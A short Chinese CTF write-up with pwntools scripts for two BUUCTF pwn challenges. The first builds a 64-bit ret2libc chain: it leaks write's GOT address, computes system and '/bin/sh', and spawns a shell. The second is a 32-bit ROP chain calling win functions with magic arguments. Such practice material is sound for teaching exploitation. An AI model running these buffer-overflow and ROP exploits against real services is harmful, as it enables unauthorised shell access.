【BUUCTF】jarvisoj_level3_x64
ROPgadget缺了rdx,对应的是输出的长度,要大于8
gdb调试可以看到rdx的值是0x200,足够大,不用管了
from pwn import*
r=remote('node3.buuoj.cn',29628)
libc=ELF('./libc-2.23.so')
elf=ELF('./level3_x64')
context.log_level = 'debug'
context.arch = elf.arch
pop_rdi=0x4006b3
pop_rsi_r15=0x4006b1
pd1='a'*0x88
pd1+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(elf.got['write'])+'a'*8
pd1+=p64(elf.sym['write'])+p64(elf.sym['main'])
r.recvuntil('Input:\n')
r.send(pd1)
true=u64(r.recv(8))
print hex(true)
base=true-0xf72b0
print hex(base)
system=base+0x45390
binsh=base+0x18cd57
pd2='a'*0x88+p64(pop_rdi)+p64(binsh)+p64(system)
r.send(pd2)
r.interactive()
【BUUCTF】picoctf_2018_rop chain
from pwn import*
r=remote('node3.buuoj.cn',29901)
elf=ELF('./PicoCTF_2018_rop_chain')
libc=ELF('./libc-2.27.so')
context.log_level = 'debug'
win1=0x080485CB
win2=0x080485D8
flag=0x0804862B
pd1='a'*0x18+'bbbb'+p32(win1)+p32(win2)+p32(flag)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
r.sendline(pd1)
r.interactive()
0xBAAAAAAD是-1163220307对应的16进制的补码作为win2函数的参数
0xDEADBAAD是-559039827对应的16进制的补码作为flag函数的参数